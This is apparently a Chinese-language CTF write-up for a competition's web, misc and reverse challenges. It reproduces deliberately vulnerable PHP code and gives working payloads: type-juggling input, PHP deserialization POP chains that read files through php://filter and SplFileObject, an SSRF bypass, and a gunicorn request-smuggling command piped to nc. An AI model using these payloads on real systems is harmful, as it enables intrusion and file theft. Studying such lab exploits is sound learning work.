目录
web
冬奥会
<?php
show_source(__FILE__);
$Step1=False;
$Step2=False;
$info=(array)json_decode(@$_GET['Information']);
if(is_array($info)){
var_dump($info);
is_numeric(@$info["year"])?die("Sorry~"):NULL;//不能为纯数字
if(@$info["year"]){
($info["year"]=2022)?$Step1=True:NULL;//数字部分为2022
}
if(is_array(@$info["items"])){
if(!is_array($info["items"][1])OR count($info["items"])!==3 ) die("Sorry~");//其是一个长度为3的数组,里边第一个元素是数组
$status = array_search("skiing", $info["items"]);
$status===false?die("Sorry~"):NULL;
foreach($info["items"] as $key=>$val){
$val==="skiing"?die("Sorry~"):NULL;//val!=="skiing"
}
$Step2=True;
}
}
if($Step1 && $Step2){
include "2022flag.php";echo $flag;
}
?>
步骤:
现对于这段代码进行分析。
json_decode接受一个JSON格式的字符串并且把它转换为PHP变量 ,
JSON 格式的字符串 $json = '{"a":"php","b":"mysql","c":3}';
首先可得,我们需要get一个字符串。
is_array是一个函数,若变量为数组类型则返回true,否则返回false
is_numeric() — 检测变量是否为数字或数字字符串,是数字和数字字符串则返回 TRUE,否则返回 FALSE
要求里边元素第一个不能是纯数字,
die() 函数输出一条消息,并退出当前脚本
array_search() 函数与 in_array() 一样,在数组中查找一个键值。
“@” 来抑制错误信息
foreach as”是一个循环语句,用于遍历数组,语法为“foreach ($array as $value) {要执行代码;}”,每进行一次循环,当前数组元素的值就会被赋值给$value变量。
从而可得:?Information={"year":"2022a","items":[0,[1],2]}
解题收获:
有一个点:2022a
PHP提供了is_numeric函数,用来变量判断是否为数字。PHP弱类型语言的一个特性,当一个整形和一个其他类型行比较的时候,会先把其他类型intval数字化再比,
intval() 函数用于获取变量的整数值,从而使得…2022a=2022
pop
Happy New Year~ MAKE A WISH
<?php
echo 'Happy New Year~ MAKE A WISH<br>';
if(isset($_GET['wish'])){
@unserialize($_GET['wish']);
}
else{
$a=new Road_is_Long;
highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/
class Road_is_Long{
public $page;
public $string;
public function __construct($file='index.php'){
$this->page = $file;
}
public function __toString(){
return $this->string->page;
}
public function __wakeup(){
if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
echo "You can Not Enter 2022";
$this->page = "index.php";
}
}
}
class {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Make_a_Change{
public $effort;
public function __construct(){
$this->effort = array();
}
public function __get($key){
$function = $this->effort;
return $function();
}
}
/**********************Try to See flag.php*****************************/
解题收获:(对于未知函数进行分析)
highlight_file函数用于对文件进行PHP语法高亮显示
isset() 函数用于检测变量是否已设置并且非 NULL。
unserialize() 函数用于将通过 serialize() 函数序列化后的对象或数组进行反序列化,并返回原始的对象结构。
public function __construct(参数列表)允许在实例化一个类之前先执行构造方法。
构造函数就是当对象被创建时,类中被自动调用的第一个函数,并且一个类中只能存在一个构造函数。和普通函数类似构造函数也可以带有参数,如果构造函数有参数的话,那么在实例化也需要传入对应的参数,
__toString(),类被当成字符串时的回应方法,此方法必须返回一个字符串,否则将发出一条 `E_RECOVERABLE_ERROR` 级别的致命错误。
__wakeup()当使用 unserialize() 反序列化一个对象成功后,会自动调用该对象的 __wakup() 魔术方法,该魔术方法既没有参数,也没有返回值。调用到__toString()
_invoke(),调用函数的方式调用一个对象时的回应方法
当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用。
__construct() 每次实例化一个类都会先调用该方法进行初始化。
__get() 魔术方法的使用。读取不可访问属性的值时,__get() 会被调用。
preg_match 函数用于执行一个正则表达式匹配(可以完成字符串的规则匹配)
步骤:
进一步,对于代码顺序进行梳理
unserialize() 反序列化一个对象成功后,自动调用该对象的 __wakup() 魔术方法,($this->page = "index.php")一个的对象当作字符串调用到__toString(),
我们最后要得到include($value);从而要输入不可访问属性的值调用__get(),
首先对于此插件进行进一步使用。
编写运行可得:
<?php
class Road_is_Long{
public $page;
public $string;
public function __construct($file){//($file='index.php')
$this->page = $file;
}
public function __toString(){
return "aaa";
}
}
class Try_Work_Hard {
protected $var='php://filter/read=convert.base64-encode/resource=flag.php' ;//代码最末尾提示flag.php
}
class Make_a_Change{
public $effort;
}
$a = new Road_is_Long('flag');
$a->string = new Make_a_Change();
$a->string->effort = new Try_Work_Hard();
$b = new Road_is_Long($a);
echo urlencode(serialize($b));//题上有unserialize
?>
从而可得:wish=O%3A12%3A"Road_is_Long"%3A2%3A%7Bs%3A4%3A"page"%3BO%3A12%3A"Road_is_Long"%3A2%3A%7Bs%3A4%3A"page"%3Bs%3A3%3A"aaa"%3Bs%3A6%3A"string"%3BO%3A13%3A"Make_a_Change"%3A1%3A%7Bs%3A6%3A"effort"%3BO%3A13%3A"Try_Work_Hard"%3A1%3A%7Bs%3A6%3A"%00%2A%00var"%3Bs%3A57%3A"php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php"%3B%7D%7D%7Ds%3A6%3A"string"%3BN%3B%7D
findme
<?php
highlight_file(__FILE__);
class a{
public $un0;
public $un1;
public $un2;
public $un3;
public $un4;
public function __destruct(){
if(!empty($this->un0) && empty($this->un2)){
$this -> Givemeanew();
if($this -> un3 === 'unserialize'){
$this -> yigei();
}
else{
$this -> giao();
}
}
}
public function Givemeanew(){
$this -> un4 = new $this->un0($this -> un1);
}
public function yigei(){
echo 'Your output: '.$this->un4;
}
public function giao(){
@eval($this->un2);
}
public function __wakeup(){
include $this -> un2.'hint.php';
}
}
$data = $_POST['data'];
unserialize($data);
解题收获:(对于未知函数进行分析)
析构函数__destruct()的作用和构造函数__construct()正好相反,析构函数只有在对象被垃圾收集器收集前(即对象从内存中删除之前)才会被自动调用
empty() 函数用于检查一个变量是否为空。
empty() 判断一个变量是否被认为是空的。当一个变量并不存在,或者它的值等同于 FALSE,那么它会被认为不存在。
步骤:
利用GlobIterator类测文件路径。
data=O:1:"a":5:{s:3:"un0";s:12:"GlobIterator";s:3:"un1";s:8:"hint.php";s:3:"un2";N;s:3:"un3";s:11:"unserialize";s:3:"un4";N;}
<2> 确定文件目录后,用SplFileObject类进行文件读取。
data=O:1:"a":5:{s:3:"un0";s:13:"SplFileObject";s:3:"un1";s:8:"hint.php";s:3:"un2";N;s:3:"un3";s:11:"unserialize";s:3:"un4";N;}
?php类似于伪协议,因此我们继续用伪协议,读取一下 hint.php. 发现
data=O:1:"a":5:{s:3:"un0";s:13:"SplFileObject";s:3:"un1";s:57:"php://filter/read=convert.base64-encode/resource=hint.php";s:3:"un2";N;s:3:"un3";s:11:"unserialize";s:3:"un4";N;} 得到了flag的提示:
<3> 知道flag的特征之后,回去利用GlobIterator类,由于 GlobIterator 类支持直接通过模式匹配来寻找文件路径,也就是说假设我们知道一个文件名的一部分,我们可以通过该类的模式匹配找到其完整的文件名。
data=O:1:"a":5:{s:3:"un0";s:12:"GlobIterator";s:3:"un1";s:6:"f*.txt";s:3:"un2";N;s:3:"un3";s:11:"unserialize";s:3:"un4";N;}
知道了文件名和路径之后,就可以利用可读取文件类SplFileObject来读取flag了。
但首先要进行反编译
$b = 'fSSSbis19k_sdW15dMe.txt';
$b = serialize($b);
var_dump($b);
echo '<br/>';
echo '<br/>';
$data='O:1:"a":5:{s:3:"un0";s:13:"SplFileObject";s:3:"un1";s:23:"fSSSbis19k_sdW15dMe.txt";s:3:"un2";N;s:3:"un3";s:11:"unserialize";s:3:"un4";N;}';
$data = unserialize($data);
var_dump($data);
结果在post可得flag
爱国敬业好青年-2
步骤:
查看源码,URL/change,URL/flag,
解题收获:
首先对于题目具有一定的观察能力,爱国敬业好青年?图片其实已经给出位置提示
对于post的格式掌握准确
Easy-SQL
步骤:
由题中的提示,首先进行get找注入点,从而进行初步的SQL注入
访问压缩包下载,可得源码分析可得。
满⾜username=admin并且password=password,⼀共是3列,内容:id,username,password
post
解题收获:
MySQL8进行了一定了解,语法新特性:支持UNION联合查询、ORDER BY排序、LIMIT子句限制产生的行数。尤其注意,所在列的后一列需要用字符表示,不能用数字,否则判断到当前列的最后一个字符会判断不出!.最好用<=替换<,
让我康康!
步骤:
提⽰Try flag
服务器是gunicorn20.0.0,想到请求⾛私
虚拟机进行操作
echo -en "GET / HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-Length: 123\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxGET /fl4g HTTP/1.1\r\nHost: 127.0.0.1/fl4g\r\nX-Forwarded-For: 127.0.0.1\r\nsecr3t_ip: 127.0.0.1\r\nContent-Length: 35\r\n\r\nGET / HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc 59.110.159.206 702
解题收获:
在gunicorn 20.0.4 版本中,存在一个请求走私漏洞,无论在gunicorn 前使用哪个代理,该漏洞都有效。 Http头中的
Sec-Websocket-Key: 1,会进行特殊解析,从而引发此漏洞。
这是一道代码审计题
步骤:
网页提示,进入 /index 页面 ,进入后并无提示,尝试抓包,
而后发现提示,进入 ./static/code.txt
用base100解码可得,由于网页限制,使得不能一次翻译到位。
def geneSign():
if(control_key==1):
return render_template("index.html")
else:
return "You have not access to this page!"
def check_ssrf(url):
hostname = urlparse(url).hostname
try:
if not re.match('https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
if not re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
raise BaseException("url format error")
if re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
if judge_ip(hostname):
return True
return False, "You not get the right clue!"
else:
ip_address = socket.getaddrinfo(hostname,'http')[0][4][0]
if is_inner_ipaddress(ip_address):
return False,"inner ip address attack"
else:
return False, "You not get the right clue!"
except BaseException as e:
return False, str(e)
except:
return False, "unknow error"
def ip2long(ip_addr):
return struct.unpack("!L", socket.inet_aton(ip_addr))[0]
def is_inner_ipaddress(ip):
ip = ip2long(ip)
print(ip)
return ip2long('127.0.0.0') >> 24 == ip >> 24 or ip2long('10.0.0.0') >> 24 == ip >> 24 or ip2long('172.16.0.0') >> 20 == ip >> 20 or ip2long('192.168.0.0') >> 16 == ip >> 16 or ip2long('0.0.0.0') >> 24 == ip >> 24
def waf1(ip):
forbidden_list = [ '.', '0', '1', '2', '7']
for word in forbidden_list:
if ip and word:
if word in ip.lower():
return True
return False
def judge_ip(ip):
if(waf1(ip)):
return Fasle
else:
addr = addr.encode(encoding = "utf-8")
ipp = base64.encodestring(addr)
ipp = ipp.strip().lower().decode()
if(ip==ipp):
global control_key
control_key = 1
return True
else:
return Fals
访问网址/index?url=https://@mti3ljaumc4x
ip我们可控的,所以构造ip=/mti3ljaumc4x,可得提示,进一步在抓包中进行cookic替换,使用传参方式POST,
POST /mti3ljaumc4x/codelogin
在codelogin⽅法中 定义了请求⽅式和请求的数据,数据就是data,cv一下
解题收获:
contentType是xml,是个xxe,根据js构造数据包,因为是 xml 数据推测存在 xxe 漏洞,尝试文件读取(不需要写协议)
MISC
隐秘的信息
步骤:
带入压缩包
fd254d0d0ded54d0 d1a9950550dd98c9a1d989e1cd19051c e1e5f7fc01f8007f
转二进制,删除头,解码可得
解题收获:
Stegsolve软件进行进一步的使用理解,
LSB隐写有其固定的步骤:
还有一个比较简单的方法,用zsteg工具,需要kali里面在线安装:gem install zsteg,使用命令格式:zsteg filename
真相只有一个
步骤:
打开压缩包,修改长宽高。
文件头前端与zip源文件数据区基本相同,修改图中文件,改后缀
文件爆破
Audacity打开
cmd中
.\SNOW.EXE -p isccmisc -C .\flag.txt
解题收获:
流量包,wireshark打开,
进入flag.txt,发现看不到数据,利用snow隐写
单板小将苏翊鸣
步骤:
进入010,修改图片高度
扫描得到提示,密码,带入可得flag
解题收获:
修改图片,一般只选择修改高度,随意修改宽度大多会造成图像图片出错。
藏在星空中的诗-1
步骤:
对文件图层分离,可得
将文档的星星按图上的顺序进行排列带入得到密码表
按txt文档顺序翻译组合可得flag。
解题收获:
图层的分离,没有ps软件,可以用在线网址
藏在星空中的诗-2
步骤:
文件中5个为一组,每组前三个均替换成u00
与表格(key_to_the_Poem)第三列对照,例✴为u+2734,则✴就用4进行替换
带入解码
解题收获:
掌握每一种编码的形式,对于星星的规律,才能在较短时间内找到题解。
2022冬奥会
步骤:
身为东道主的你知道此次冬奥会的吉祥物分别是谁吗?并且你知道这两只冬奥会的吉祥物最初设计的原型分别是什么吗?
按题目提示(图片修改长宽高后,还有提示),可直接将“灯笼”填入可得
得到一个损坏图片,拖入010既得
降维打击
步骤:
使用010图片分离,可得
zsteg工具分析,提取可得
魔女字体,对照翻译
解题收获:
PNG隐写工具 zsteg的使用方法:zsteg可以检测PNG和BMP图片里的隐写数据
zsteg -a [png图片]
zsteg -E "b1,r,lsb,yx" [png图片] > out.png
REVERSE
GetTheTable
步骤:
IDA打开,找到main,tab反编译
找到信息,解码
Bob’s Code
步骤:
IDA打开,找到main,得到字符串
import base64
import string
a = '代码'
secret = ''
for j in a:
if(j == '.'):
print(j,end='')
continue
if(ord(j)>=48 and ord(j)<=57):
print(j,end='')
continue
for i in range(65,127):
if(i>=65 and i <=90):
if((i + 2 - 65) % 26 + 65 == ord(j)):
print(chr(i),end='')
break
elif(i>=97 and i <= 123):
if((i + 2 - 97) % 26 + 97 == ord(j)):
print(chr(i),end='')
break
print('\n')
print(secret)
str1 = '===='
string1 = "ABCDEfghijklmnopqrsTUVWXYZabcdeFGHIJKLMNOPQRStuvwxyz0123456789-_"
string2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
flag1 = base64.b64decode(str1.translate(str.maketrans(string1,string2)))
flag = base64.b64decode(flag1)
print(flag)
放入a中,之后结果放入str1中,可得flag
解题收获:
tab进行反编译(时间长不写都忘了),其次就是脚本能力,我只会改脚本…
扫一扫
1653
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
